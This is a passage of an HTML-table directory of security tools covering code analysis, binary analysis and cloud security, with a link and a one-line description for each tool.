href="https://github.com/googleprojectzero/weggli">googleprojectzero/weggli</a></td> <td>weggli is a fast and robust semantic search tool for C and C++ codebases. It is designed to help security researchers identify interesting functionality in large codebases.</td> </tr> <tr> <td><a href="https://huntersuite.io/">HunterSuite</a></td> <td>HunterSuite is the next generation offensive security suite. It will automate all the tedious tasks during a test just with few clicks. If you are a penetration tester, red teamer, bug bounty hunter, or you work as an offensive security engineer, you will love what HunterSuite has to offer.</td> </tr> <tr> <td><a href="https://illuminatejs.geeksonsecurity.com/">IlluminateJs</a></td> <td>IlluminateJs is a static javascript analysis engine (a deobfuscator so to say) aimed to help analyst understand obfuscated and potentially malicious JavaScript Code.</td> </tr> </tr> <tr> <td><a href="https://github.com/ismailtasdelen/xss-payload-list">ismailtasdelen/xss-payload-list</a></td> <td>Cross Site Scripting ( XSS ) Vulnerability Payload List</td> </tr> <tr> <td><a href="https://github.com/jonluca/Anubis">jonluca/Anubis</a></td> <td>Subdomain enumeration and information gathering tool</td> </tr> <tr> <td><a href="https://github.com/LanikSJ/dfimage">LanikSJ/dfimage</a></td> <td>Reverse-engineer a Dockerfile from a Docker image.</td> </tr> <tr> <td><a href="https://github.com/lelinhtinh/de4js">lelinhtinh/de4js</a></td> <td>JavaScript Deobfuscator and Unpacker</td> </tr> <tr> <td><a href="https://github.com/mazen160/bfac">mazen160/bfac</a></td> <td>BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code.</td> </tr> <tr> <td><a href="https://github.com/microsoft/onefuzz">microsoft/onefuzz</a></td> <td>A self-hosted Fuzzing-As-A-Service platform</td> </tr> <tr> <td><a href="https://github.com/mindedsecurity/JStillery">mindedsecurity/JStillery</a></td> <td>Advanced JS Deobfuscation via Partial Evaluation.</td> </tr> <tr> <td><a href="https://github.com/mwrlabs/dref">mwrlabs/dref</a></td> <td>DNS Rebinding Exploitation Framework</td> </tr> <tr> <td><a href="https://github.com/nccgroup/singularity">nccgroup/singularity</a></td> <td>A DNS rebinding attack framework</td> </tr> <tr> <td><a href="https://github.com/nccgroup/whalescan">nccgroup/whalescan</a></td> <td>Whalescan is a vulnerability scanner for Windows containers, which performs several benchmark checks, as well as checking for CVEs/vulnerable packages on the container</td> </tr> <tr> <td><a href="https://github.com/NetSPI/AutoDirbuster">NetSPI/AutoDirbuster</a></td> <td>Automatically run and save Dirbuster scans for multiple IPs</td> </tr> <tr> <td><a href="https://github.com/NetSPI/PowerUpSQL">NetSPI/PowerUpSQL</a></td> <td>PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server</td> </tr> <tr> <td><a href="https://github.com/NotSoSecure/SerializedPayloadGenerator">NotSoSecure/SerializedPayloadGenerator</a></td> <td>It's Web Interface to generate payload using various deserialization exploitation framework</td> </tr> <tr> <td><a href="https://github.com/ossf/allstar">ossf/allstar</a></td> <td>GitHub App to set and enforce security policies</td> </tr> <tr> <td><a href="https://github.com/ossf/scorecard">ossf/scorecard</a></td> <td>Security Scorecards - Security health metrics for Open Source</td> </tr> <tr> <td><a href="https://github.com/OJ/gobuster">OJ/gobuster</a></td> <td>Directory/File, DNS and VHost busting tool written in Go</td> </tr> <tr> <td><a href="https://github.com/OWASP/Nettacker">OWASP/Nettacker</a></td> <td>Automated Penetration Testing Framework - Open-Source Vulnerability Scanner - Vulnerability Management</td> </tr> <tr> <td><a href="https://github.com/OWASP/wstg">OWASP/wstg</a></td> <td>The Web Security Testing Guide is a comprehensive Open Source guide to testing the security of web applications and web services.</td> </tr> <tr> <td><a href="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project">OWASP Zed Attack Proxy Project</a></td> <td>The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers</td> </tr> <tr> <td><a href="https://github.com/praetorian-inc/gokart">praetorian-inc/gokart</a></td> <td>A static analysis tool for securing Go code</td> </tr> <tr> <td><a href="https://github.com/praetorian-inc/snowcat">praetorian-inc/snowcat</a></td> <td>a tool to audit the istio service mesh</td> </tr> <tr> <td><a href="https://github.com/presidentbeef/brakeman">presidentbeef/brakeman</a></td> <td>A static analysis security vulnerability scanner for Ruby on Rails applications</td> </tr> <tr> <td><a href="https://publicwww.com/">Public WWW</a></td> <td>Source Code Search Engine</td> </tr> <tr> <td><a href="https://github.com/pumasecurity/puma-scan">pumasecurity/puma-scan</a></td> <td>Puma Scan is a software security Visual Studio extension that provides real time, continuous source code analysis as development teams write code. Vulnerabilities are immediately displayed in the development environment as spell check and compiler warnings, preventing security bugs from entering your applications.</td> </tr> <tr> <td><a href="https://github.com/pwntester/ysoserial.net">pwntester/ysoserial.net</a></td> <td>Deserialization payload generator for a variety of .NET formatters</td> </tr> <tr> <td><a href="https://github.com/quarkslab/kdigger">quarkslab/kdigger</a></td> <td>kdigger is a context discovery tool for Kubernetes penetration testing.</td> </tr> <tr> <td><a href="https://github.com/redphx/localify">redphx/localify</a></td> <td>Effectively debug minified JS files</td> </tr> <tr> <td><a href="https://github.com/RedTeamPentesting/monsoon">RedTeamPentesting/monsoon</a></td> <td>Fast HTTP enumerator</td> </tr> <tr> <td><a href="https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension">RhinoSecurityLabs/IPRotate_Burp_Extension</a></td> <td>Extension for Burp Suite which uses AWS API Gateway to rotate your IP on every request.</td> </tr> <tr> <td><a href="https://github.com/RhinoSecurityLabs/SleuthQL">RhinoSecurityLabs/SleuthQL</a></td> <td>Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap.</td> </tr> <tr> <td><a href="https://github.com/rpgeeganage/audit-node-modules-with-yara">rpgeeganage/audit-node-modules-with-yara</a></td> <td>Audit Node Module folder with YARA rules to identify possible malicious packages hiding in node_moudles</td> </tr> <tr> <td><a href="https://github.com/s0md3v/XSStrike">s0md3v/XSStrike</a></td> <td>Most advanced XSS detection suite</td> </tr> <tr> <td><a href="https://github.com/salesforce/DazedAndConfused">salesforce/DazedAndConfused</a></td> <td>DazedAndConfused is a tool to help determine dependency confusion exposure.</td> </tr> <tr> <td><a href="https://github.com/Screetsec/Sudomy">Screetsec/Sudomy</a></td> <td>Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting</td> </tr> <tr> <td><a href="https://github.com/securego/gosec">securego/gosec</a></td> <td>Golang security checker</td> </tr> <tr> <td><a href="https://snyk.io/">Snyk</a></td> <td>Continuously find & fix vulnerabilities in your dependencies</td> </tr> <tr> <td><a href="https://github.com/sslab-gatech/Rudra">sslab-gatech/Rudra</a></td> <td>Rust Memory Safety & Undefined Behavior Detection</td> </tr> <tr> <td><a href="https://github.com/subfinder/subfinder">subfinder/subfinder</a></td> <td>SubFinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing.</td> </tr> <tr> <td><a href="https://github.com/vchinnipilli/kubestriker">vchinnipilli/kubestriker</a></td> <td>A Blazing fast Security Auditing tool for Kubernetes</td> </tr> <tr> <td><a href="https//github.com/visma-prodsec/confused">visma-prodsec/confused</a></td> <td>Tool to check for dependency confusion vulnerabilities in multiple package management systems</td> </tr> <tr> <td><a href="https://github.com/wallarm/gotestwaf">wallarm/gotestwaf</a></td> <td>Go Test WAF project, a tool to test different WAF detects for apps and APIs</td> </tr> <tr> <td><a href="https://github.com/wagiro/BurpBounty">wagiro/BurpBounty</a></td> <td>Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that allows you, in a quick and simple way, to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface.</td> </tr> <tr> <td><a href="https://github.com/wagoodman/dive">wagoodman/dive</a></td> <td>A tool for exploring each layer in a docker image</td> </tr> <tr> <td><a href="https://docs.wpdc.org/">wpdc</a></td> <td>Detect malicious dependencies, magecart, malvertising, and more on your web properties!</td> </tr> <tr> <td><a href="https://github.com/xmendez/wfuzz">xmendez/wfuzz</a></td> <td>Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.</td> </tr> <tr> <td><a href="https://github.com/Yelp/detect-secrets">Yelp/detect-secrets</a></td> <td>An enterprise friendly way of detecting and preventing secrets in code.</td> </tr> <tr> <td><a href="https://github.com/ZupIT/horusec">ZupIT/horusec</a></td> <td>Horusec is an open source tool that improves identification of vulnerabilities in your project with just one command.</td> </tr> </table> ## Binary Analysis <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/acsdavid97/DotNetHooker">acsdavid97/DotNetHooker</a></td> <td>API tracing and argument dumping to ease reverse engineering .NET malware.</td> </tr> <tr> <td><a href="https://github.com/Air14/HyperHide">Air14/HyperHide</a></td> <td>Hypervisor based anti anti debug plugin for x64dbg</td> </tr> <tr> <td><a href="https://github.com/ajpc500/RelayRumbler">ajpc500/RelayRumbler</a></td> <td>A proof-of-concept tool that attempts to retrieve the configuration from the memory dump of an F-Secure C3 Relay executable.</td> </tr> <tr> <td><a href="https://github.com/avast-tl/retdec">avast-tl/retdec</a></td> <td>RetDec is a retargetable machine-code decompiler based on LLVM</td> </tr> <tr> <td><a href="https://binvis.io/#/">binvis.io</a></td> <td>visual analysis of binary files</td> </tr> <tr> <td><a href="https://github.com/blackberry/pe_tree">blackberry/pe_tree</a></td> <td>Python module for viewing Portable Executable (PE) files in a tree-view using pefile and PyQt5. Can also be used with IDA Pro to dump in-memory PE files and reconstruct imports.</td> </tr> <tr> <td><a href="https://git.sr.ht/~prabhu/blint">BLint</a></td> <td>BLint is a Binary Linter to check the security properties, and capabilities in your executables. It is powered by lief</td> </tr> <tr> <td><a href="https://github.com/bootleg/ret-sync">bootleg/ret-sync</a></td> <td>ret-sync is a set of plugins that helps to synchronize a debugging session (WinDbg/GDB/LLDB/OllyDbg2/x64dbg) with IDA/Ghidra disassemblers.</td> </tr> <tr> <td><a href="https://github.com/can1357/NoVmp">can1357/NoVmp</a></td> <td>A static devirtualizer for VMProtect x64 3.x. powered by VTIL.</td> </tr> <tr> <td><a href="https://github.com/carbonblack/binee">carbonblack/binee</a></td> <td>Binee: binary emulation environment</td> </tr> <tr> <td><a href="https://github.com/Cisco-Talos/GhIDA">Cisco-Talos/GhIDA</a></td> <td>GhIDA is an IDA Pro plugin that integrates the Ghidra decompiler in IDA.</td> </tr> <tr> <td><a href="https://github.com/Cisco-Talos/Ghidraaas">Cisco-Talos/Ghidraaas</a></td> <td>Ghidraaas is a simple web server that exposes Ghidra analysis through REST APIs. The project includes three Ghidra plugins to analyze a sample, get the list of functions and to decompile a function.</td> </tr> <tr> <td><a href="https://github.com/certcc/kaiju">certcc/kaiju</a></td> <td>CERT Kaiju is a binary analysis framework extension for the Ghidra software reverse engineering suite</td> </tr> <tr> <td><a href="https://github.com/Comsecuris/gdbghidra">Comsecuris/gdbghidra</a></td> <td>gdbghidra - a visual bridge between a GDB session and GHIDRA</td> </tr> <tr> <td><a href="https://github.com/Comsecuris/gdbida">Comsecuris/gdbida</a></td> <td>gdbida - a visual bridge between a GDB session and IDA Pro's disassembler</td> </tr> <tr> <td><a href="https://cutter.re/">Cutter</a></td> <td>Free and Open Source RE Platform powered by radare2</td> </tr> <tr> <td><a href="https://github.com/DarthTon/Blackbone">DarthTon/Blackbone</a></td> <td>Windows memory hacking library</td> </tr> <tr> <td><a href="https://github.com/dr4k0nia/Unscrambler">dr4k0nia/Unscrambler</a></td> <td>Universal unpacker and fixer for a number of modded ConfuserEx protections</td> </tr> <tr> <td><a href="https://github.com/endgameinc/xori">endgameinc/xori</a></td> <td>Xori is an automation-ready disassembly and static analysis library for PE32, 32+ and shellcode</td> </tr> <tr> <td><a href="https://github.com/enkomio/shed">enkomio/shed</a></td> <td>.NET runtine inspector. <a href="http://antonioparata.blogspot.it/2017/11/shed-inspect-net-malware-like-sir.html">Shed - Inspect .NET malware like a Sir</a></td> </tr> <tr> <td><a href="https://github.com/FernandoDoming/r2diaphora">FernandoDoming/r2diaphora</a></td> <td>r2diaphora is a port of Diaphora to radare2 and MySQL. It also uses r2ghidra as decompiler by default, with support for other decompilers such as pdc.</td> </tr> <tr> <td><a href="https://github.com/fireeye/flare-emu">flare-emu</a></td> <td>flare-emu marries a supported binary analysis framework, such as IDA Pro or Radare2, with Unicorns emulation framework to provide the user with an easy to use and flexible interface for scripting emulation tasks.</td> </tr> <tr> <td><a href="https://www.fibratus.io/">fibratus</a></td> <td>A modern tool for the Windows kernel exploration and observability</td> </tr> <tr> <td><a href="https://github.com/fireeye/capa">fireeye/capa</a></td> <td>capa detects capabilities in executable files. You run it against a PE file or shellcode and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate.</td> </tr> <tr> <td><a href="https://github.com/fireeye/capa-rules">fireeye/capa-rules</a></td> <td>Standard collection of rules for capa: the tool for enumerating the capabilities of programs</td> </tr> <tr> <td><a href="https://github.com/fireeye/flare-floss">fireeye/flare-floss</a></td> <td>FireEye Labs Obfuscated String Solver - Automatically extract obfuscated strings from malware.</td> </tr> <tr> <td><a href="https://github.com/fireeye/speakeasy">fireeye/speakeasy</a></td> <td>Speakeasy is a portable, modular, binary emulator designed to emulate Windows kernel and user mode malware.</td> </tr> <tr> <td><a href="https://github.com/fireeye/stringsifter">fireeye/stringsifter</a></td> <td>A machine learning tool that ranks strings based on their relevance for malware analysis.</td> </tr> <tr> <td><a href="https://github.com/forrest-orr/moneta">forrest-orr/moneta</a></td> <td>Moneta is a live usermode memory analysis tool for Windows with the capability to detect malware IOCs</td> </tr> <tr> <td><a href="https://github.com/FuzzySecurity/Dendrobate">FuzzySecurity/Dendrobate</a></td> <td>Managed code hooking template.</td> </tr> <tr> <td><a href="https://github.com/FuzzySecurity/Fermion">FuzzySecurity/Fermion</a></td> <td>Fermion, an electron wrapper for Frida & Monaco.</td> </tr> <tr> <td><a href="https://github.com/gaasedelen/tenet">gaasedelen/tenet</a></td> <td>A Trace Explorer for Reverse Engineers</td> </tr> <tr> <td><a href="https://github.com/GaloisInc/reopt">GaloisInc/reopt</a></td> <td>A tool for analyzing x86-64 binaries.</td> </tr> <tr> <td><a href="https://ghidra-sre.org/">GHIDRA</a></td> <td>A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission</td> </tr> <tr> <td><a href="https://go-re.tk/">Go Reverse Engineering Toolkit</a></td> <td>A Reverse Engineering Tool Kit for Go, Written in Go.</td> </tr> <tr> <td><a href="https://github.com/goretk/redress">goretk/redress</a></td> <td>Redress - A tool for analyzing stripped Go binaries</td> </tr> <tr> <td><a href="https://github.com/grimm-co/GEARSHIFT">grimm-co/GEARSHIFT</a></td> <td>GEARSHIFT is a tool that performs structure recovery for a specified function within a stripped binary. It also generates a fuzz harness that can be used to call functions in a shared object (.so) or dynamically linked library (.dll) file.</td> </tr> <tr> <td><a href="https://github.com/guelfoweb/peframe">guelfoweb/peframe</a></td> <td>PEframe is a open source tool to perform static analysis on Portable Executable malware and malicious MS Office documents.</td> </tr> <tr> <td><a href="https://github.com/hasherezade/hollows_hunter">hasherezade/hollows_hunter</a></td> <td>A process scanner detecting and dumping hollowed PE modules.</td> </tr> <tr> <td><a href="https://github.com/hasherezade/hook_finder">hasherezade/hook_finder</a></td> <td>a small tool for investigating inline hooks (and other in-memory code patches)</td> </tr> <tr> <td><a href="https://github.com/hasherezade/pe_to_shellcode">hasherezade/pe_to_shellcode</a></td> <td>Converts PE into a shellcode</td> </tr> <tr> <td><a href="https://github.com/herosi/CTO">herosi/CTO</a></td> <td>Call Tree Overviewer</td> </tr> <tr> <td><a href="https://github.com/HyperDbg/HyperDbg">HyperDbg/HyperDbg</a></td> <td>The Source Code of HyperDbg Debugger 🐞</td> </tr> <tr> <td><a href="https://github.com/hzqst/unicorn_pe">hzqst/unicorn_pe</a></td> <td>Unicorn PE is an unicorn based instrumentation project designed to emulate code execution for windows PE files.</td> </tr> <tr> <td><a href="https://kaitai.io">Kaitai Struct</a></td> <td>Kaitai Struct is a declarative language used to describe various binary data structures, laid out in files or in memory: i.e. binary file formats, network stream packet formats, etc.</td> </tr> <tr> <td><a href="https://lief.quarkslab.com/">LIEF</a></td> <td>Library to Instrument Executable Formats</td> </tr> <tr> <td><a href="https://github.com/Martyx00/CollaRE">Martyx00/CollaRE</a></td> <td>CollareRE is a tool for collaborative reverse engineering that aims to allow teams that do need to use more then one tool during a project to collaborate without the need to share the files on a separate locations.</td> </tr> <tr> <td><a href="https://github.com/Microsoft/binskim">Microsoft/binskim</a></td> <td>A binary static analysis tool that provides security and correctness results for Windows portable executables</td> </tr> <tr> <td><a href="https://github.com/Microsoft/ProcDump-for-Linux">Microsoft/ProcDump-for-Linux</a></td> <td>A Linux version of the ProcDump Sysinternals tool</td> </tr> <tr> <td><a href="https://github.com/MITRECND/malchive">MITRECND/malchive</a></td> <td>Various capabilities for static malware analysis.</td> </tr> <tr> <td><a href="https://github.com/mrphrazer/obfuscation_detection">mrphrazer/obfuscation_detection</a></td> <td>Collection of scripts to pinpoint obfuscated code</td> </tr> <tr> <td><a href="https://github.com/mxmssh/drltrace">mxmssh/drltrace</a></td> <td>Drltrace is a library calls tracer for Windows and Linux applications</td> </tr> <tr> <td><a href="https://github.com/NASA-SW-VnV/ikos">NASA-SW-VnV/ikos</a></td> <td>IKOS (Inference Kernel for Open Static Analyzers) is a static analyzer for C/C++ based on the theory of Abstract Interpretation</td> </tr> <tr> <td><a href="https://github.com/nsacyber/BAM">nsacyber/BAM</a></td> <td>The Binary Analysis Metadata tool gathers information about Windows binaries to aid in their analysis.</td> </tr> <tr> <td><a href="https://github.com/nccgroup/WindowsMemPageDelta">nccgroup/WindowsMemPageDelta</a></td> <td>A Microsoft Windows service to provide telemetry on Windows executable memory page changes to facilitate threat detection</td> </tr> <tr> <td><a href="https://github.com/OALabs/hashdb-ida">OALabs/hashdb-ida</a></td> <td>HashDB API hash lookup plugin for IDA Pro</td> </tr> <tr> <td><a href="https://github.com/osandov/drgn">osandov/drgn</a></td> <td>Programmable debugger</td> </tr> <tr> <td><a href="https://github.com/pierrezurek/Signsrch">pierrezurek/Signsrch</a></td> <td>tool for searching signatures inside files, extremely useful in reversing engineering for figuring or having an initial idea of what encryption/compression algorithm is used for a proprietary protocol or file. it can recognize tons of compression, multimedia and encryption algorithms and many other things like known strings and anti-debugging code which can be also manually added since it's all based on a text signature file read at runtime and easy to modify.</td> </tr> <tr> <td><a href="https://rayanfam.com/topics/pinitor/">Pinitor</a></td> <td>An API Monitor Based on Pin</td> </tr> <tr> <td><a href="https://pypi.org/project/pygore/">pygore</a></td> <td>Python library for analyzing Go binaries</td> </tr> <tr> <td><a href="https://github.com/qilingframework/qiling">qilingframework/qiling</a></td> <td>Qiling Advanced Binary Emulation Framework</td> </tr> <tr> <td><a href="https://github.com/revng/pagebuster">revng/pagebuster</a></td> <td>PageBuster - dump all executable pages of packed processes.</td> </tr> <tr> <td><a href="https://github.com/REW-sploit/REW-sploit">REW-sploit/REW-sploit</a></td> <td>Emulate and Dissect MSF and *other* attacks</td> </tr> <tr> <td><a href="https://rizin.re/">rizin</a></td> <td>Free and Open Source Reverse Engineering Framework</td> </tr> <tr> <td><a href="https://github.com/secretsquirrel/recomposer">secretsquirrel/recomposer</a></td> <td>Randomly changes Win32/64 PE Files for 'safer' uploading to malware and sandbox sites.</td> </tr> <tr> <td><a href="https://github.com/sibears/IDAGolangHelper">sibears/IDAGolangHelper</a></td> <td>Set of IDA Pro scripts for parsing GoLang types information stored in compiled binary</td> </tr> <tr> <td><a href="https://github.com/strazzere/golang_loader_assist">strazzere/golang_loader_assist</a></td> <td>Making GO reversing easier in IDA Pro</td> </tr> <tr> <td><a href="https://github.com/taviso/loadlibrary">taviso/loadlibrary</a></td> <td>Porting Windows Dynamic Link Libraries to Linux</td> </tr> <tr> <td><a href="https://github.com/unipacker/unipacker">unipacker/unipacker</a></td> <td>Automatic and platform-independent unpacker for Windows binaries based on emulation</td> </tr> <tr> <td><a href="https://github.com/utkonos/lst2x64dbg">utkonos/lst2x64dbg</a></td> <td>Extract labels from IDA, Ghidra, Binary Ninja, and Relyze files and export x64dbg database. Including radare2 main address.</td> </tr> <tr> <td><a href="https://codisec.com/veles/">Veles</a></td> <td>New open source tool for binary data analysis</td> </tr> <tr> <td><a href="https://salmanarif.bitbucket.io/visual/index.html">VisUAL</a></td> <td>A highly visual ARM emulator</td> </tr> <tr> <td><a href="https://githacks.org/vmp2/vmemu">vmp2/vmemu</a></td> <td>VMProtect 2 Virtual Machine Handler Emulation</td> </tr> <tr> <td><a href="https://github.com/Wenzel/checksec.py">Wenzel/checksec.py</a></td> <td>Checksec tool in Python, Rich output. Based on LIEF</td> </tr> <tr> <td><a href="https://github.com/WerWolv/ImHex">WerWolv/ImHex</a></td> <td>A Hex Editor for Reverse Engineers, Programmers and people that value their eye sight when working at 3 AM.</td> </tr> <tr> <td> <a href="https://github.com/williballenthin/python-idb">williballenthin/python-idb</a> </td> <td> Pure Python parser and analyzer for IDA Pro database files (.idb). </td> </tr> </table> ## Cloud Security <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/0xsha/CloudBrute/">0xsha/CloudBrute</a></td> <td>A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.</td> </tr> <tr> <td><a href="https://github.com/Alfresco/prowler">Alfresco/prowler</a></td> <td>Tool for AWS security assessment, auditing and hardening. It follows guidelines of the CIS Amazon Web Services Foundations Benchmark.</td> </tr> <tr> <td><a href="https://github.com/andresriancho/nimbostratus">andresriancho/nimbostratus</a></td> <td>Tools for fingerprinting and exploiting Amazon cloud infrastructures</td> </tr> <tr> <td><a href="https://asecure.cloud/">asecure.cloud</a></td> <td>A free repository of customizable AWS security configurations and best practices</td> </tr> <tr> <td><a href="https://bitbucket.org/asecurityteam/spacecrab">asecurityteam/spacecrab</a></td> <td>Bootstraps an AWS account with everything you need to generate, mangage, and distribute and alert on AWS honey tokens. Made with breakfast roti by the Atlassian security team.</td> </tr> <tr> <td><a href="https://github.com/aws-cloudformation/cloudformation-guard">aws-cloudformation/cloudformation-guard</a></td> <td>Guard offers a policy-as-code domain-specific language (DSL) to write rules and validate JSON- and YAML-formatted data such as CloudFormation Templates, K8s configurations, and Terraform JSON plans/configurations against those rules.</td> </tr> <tr> <td><a href="https://github.com/awslabs/aws-security-benchmark">awslabs/aws-security-benchmark</a></td> <td>Open source demos, concept and guidance related to the AWS CIS Foundation framework.</td> </tr> <tr> <td><a href="https://github.com/Azure/Stormspotter">Azure/Stormspotter</a></td> <td>Azure Red Team tool for graphing Azure and Azure Active Directory objects</td> </tr> <tr> <td><a href="https://github.com/BishopFox/iam-vulnerable">BishopFox/iam-vulnerable</a></td> <td>Use Terraform to create your own vulnerable by design AWS IAM privilege escalation playground.</td> </tr> <tr> <td><a href="https://github.com/BishopFox/smogcloud">BishopFox/smogcloud</a></td> <td>Find cloud assets that no one wants exposed</td> </tr> <tr> <td><a href="https://github.com/BloodHoundAD/AzureHound">BloodHoundAD/AzureHound</a></td> <td>Azure Hound</td> </tr> <tr> <td><a href="https://github.com/bridgecrewio/cdkgoat">bridgecrewio/cdkgoat</a></td> <td>CdkGoat is Bridgecrew's "Vulnerable by Design" AWS CDK repository. CdkGoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments.</td> </tr> <tr> <td><a href="https://github.com/bridgecrewio/cfngoat">bridgecrewio/cfngoat</a></td> <td>Cfngoat is Bridgecrew's "Vulnerable by Design" Cloudformation repository. Cfngoat is a learning and training project that demonstrates how common configuration errors can find their way into production cloud environments.</td> </tr> <tr> <td><a href="https://github.com/carnal0wnage/weirdAAL/wiki">carnal0wnage/weirdAAL</a></td> <td>WeirdAAL [AWS Attack Library] wiki!</td> </tr> <tr> <td><a href="https://github.com/cisagov/Sparrow">cisagov/Sparrow</a></td> <td>Sparrow.ps1 was created by CISA's Cloud Forensics team to help detect possible compromised accounts and applications in the Azure/m365 environment.</td> </tr> <tr> <td><a href="https://github.com/cloud-sniper/cloud-sniper">cloud-sniper/cloud-sniper</a></td> <td>Cloud Security Operations Orchestrator</td> </tr> <tr> <td><a href="https://github.com/cloudquery/cloudquery">cloudquery/cloudquery</a></td> <td>cloudquery transforms your cloud infrastructure into queryable SQL tables for easy monitoring, governance and security.</td> </tr> <tr> <td><a href="https://github.com/cloudsploit/scans">cloudsploit/scans</a></td> <td>AWS security scanning checks</td> </tr> <tr> <td><a href="https://github.com/cr0hn/festin">cr0hn/festin</a></td> <td>FestIn is a tool for discovering open S3 Buckets starting from a domains.</td> </tr> <tr> <td><a href="https://github.com/CrowdStrike/CRT">CrowdStrike/CRT</a></td> <td>This tool queries the following configurations in the Azure AD/O365 tenant which can shed light on hard to find permissions and configuration settings in order to assist organizations in securing these environments.</td> </tr> <tr> <td><a href="https://github.com/cyberark/blobhunter">cyberark/blobhunter</a></td> <td>Find exposed data in Azure with this public blob scanner</td> </tr> <tr> <td><a href="https://github.com/cyberark/SkyArk">cyberark/SkyArk</a></td> <td>SkyArk is a cloud security tool, helps to discover, assess and secure the most privileged entities in AWS</td> </tr> <tr> <td><a href="https://github.com/cyberark/SkyWrapper">cyberark/SkyWrapper</a></td> <td>SkyWrapper helps to discover suspicious creation forms and uses of temporary tokens in AWS</td> </tr> <tr> <td><a href="https://github.com/dagrz/aws_pwn">dagrz/aws_pwn</a></td> <td>A collection of AWS penetration testing junk</td> </tr> <tr> <td><a href="https://github.com/darkbitio/aws-recon">darkbitio/aws-recon</a></td> <td>Multi-threaded AWS inventory collection tool with a focus on security-relevant resources and metadata.</td> </tr> <tr> <td><a href="https://github.com/darkquasar/AzureHunter">darkquasar/AzureHunter</a></td> <td>A Cloud Forensics Powershell module to run threat hunting playbooks on data from Azure and O365</td> </tr> <tr> <td><a href="https://github.com/disruptops/cred_scanner">disruptops/cred_scanner</a></td> <td>A simple file-based scaner to look for potential AWS accesses and secret keys in files</td> </tr> <tr> <td><a href="https://github.com/duo-labs/cloudtracker">duo-labs/cloudtracker</a></td> <td>CloudTracker helps you find over-privileged IAM users and roles by comparing CloudTrail logs with current IAM policies.</td> </tr> <tr> <td><a href="https://github.com/duo-labs/cloudmapper">duo-labs/cloudmapper</a></td> <td>CloudMapper helps you analyze your Amazon Web Services (AWS) environments.</td> </tr> <tr> <td><a href="https://github.com/endgameinc/varna">endgameinc/varna</a></td> <td>Varna: Quick & Cheap AWS CloudTrail Monitoring with Event Query Language (EQL)</td> </tr> <tr> <td><a href="https://github.com/eth0izzle/bucket-stream">eth0izzle/bucket-stream</a></td> <td>Find interesting Amazon S3 Buckets by watching certificate transparency logs.</td> </tr> <tr> <td><a href="https://github.com/FishermansEnemy/bucket_finder">FishermansEnemy/bucket_finder</a></td> <td>Amazon bucket brute force tool</td> </tr> <tr> <td><a href="https://github.com/FSecureLABS/Azurite">FSecureLABS/Azurite</a></td> <td>Enumeration and reconnaissance activities in the Microsoft Azure Cloud.</td> </tr> <tr> <td><a href="https://github.com/glen-mac/goGetBucket">glen-mac/goGetBucket</a></td> <td>A penetration testing tool to enumerate and analyse Amazon S3 Buckets owned by a domain.</td> </tr> <tr> <td><a href="https://github.com/google/cloud-forensics-utils">google/cloud-forensics-utils</a></td> <td>Python library to carry out DFIR analysis on the Cloud</td> </tr> <tr> <td><a href="https://github.com/hausec/PowerZure">hausec/PowerZure</a></td> <td>PowerShell framework to assess Azure security</td> </tr> <tr> <td><a href="https://github.com/initstring/cloud_enum">initstring/cloud_enum</a></td> <td>Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.</td> </tr> <tr> <td><a href="https://github.com/jonrau1/ElectricEye">jonrau1/ElectricEye</a></td> <td>Continuously monitor your AWS services for configurations that can lead to degradation of confidentiality, integrity or availability. All results will be sent to Security Hub for further aggregation and analysis.</td> </tr> <tr> <td><a href="https://github.com/jordanpotti/AWSBucketDump">jordanpotti/AWSBucketDump</a></td> <td>Security Tool to Look For Interesting Files in S3 Buckets</td> </tr> <tr> <td><a href="https://github.com/jordanpotti/CloudScraper">jordanpotti/CloudScraper</a></td> <td>CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.</td> </tr> <tr> <td><a href="https://github.com/kromtech/s3-inspector">kromtech/s3-inspector</a></td> <td>Tool to check AWS S3 bucket permissions</td> </tr> <tr> <td><a href="https://github.com/lyft/metadataproxy">lyft/metadataproxy</a></td> <td>A proxy for AWS's metadata service that gives out scoped IAM credentials from STS</td> </tr> <tr> <td><a href="https://github.com/MindPointGroup/cloudfrunt">MindPointGroup/cloudfrunt</a></td> <td>A tool for identifying misconfigured CloudFront domains</td> </tr> <tr> <td><a href="https://github.com/nccgroup/aws-inventory">nccgroup/aws-inventory</a></td> <td>Discover resources created in an AWS account</td> </tr> <tr> <td><a href="https://github.com/rootsecdev/Azure-Red-Team">nccgroup/azucar</a></td> <td>Security auditing tool for Azure environments</td> </tr> <tr> <td><a href="https://github.com/nccgroup/PMapper">nccgroup/PMapper</a></td> <td>A tool for quickly evaluating IAM permissions in AWS.</td> </tr> <tr> <td><a href="https://github.com/nccgroup/s3_objects_check">nccgroup/s3_objects_check</a></td> <td>Whitebox evaluation of effective S3 object permissions, in order to identify publicly accessible objects.</td> </tr> <tr> <td><a href="https://github.com/nccgroup/Scout2">nccgroup/Scout2</a></td> <td>Security auditing tool for AWS environments</td> </tr> <tr> <td><a 